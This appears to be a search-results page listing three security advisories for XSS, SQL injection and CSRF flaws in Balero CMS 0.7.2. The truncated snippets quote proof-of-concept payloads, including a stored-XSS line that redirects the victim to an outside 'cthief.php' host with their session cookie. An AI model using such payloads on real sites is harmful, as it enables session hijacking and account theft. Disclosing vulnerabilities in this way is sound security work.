3 matches found
Balero CMS 0.7.2 Cross Site Scripting / SQL Injection Vulnerabilities
Balero CMS version 0.7.2 suffers from cross site scripting and SQL injection vulnerabilities. document.cookie="counter=1confirm'XSS'; path=/balerocms/"; csrf+stored xss+filter bypass+session hijack: input type="hidden" name="content" value...
Balero CMS 0.7.2 - Multiple JS/HTML Injection Vulnerabilities
document.cookie="counter=1confirm'XSS'; path=/balerocms/"; csrf+stored xss+filter bypass+session hijack: document.location="http://www.zeroscience.mk/pentest/cthief...
Balero CMS 0.7.2 Cross Site Scripting
document.cookie="counter=1confirm'XSS'; path=/balerocms/"; csrf+stored xss+filter bypass+session hijack: document.location="http://www.zeroscience.mk/pentest/cthief.php?cookie="+docu\ment.cookie;"...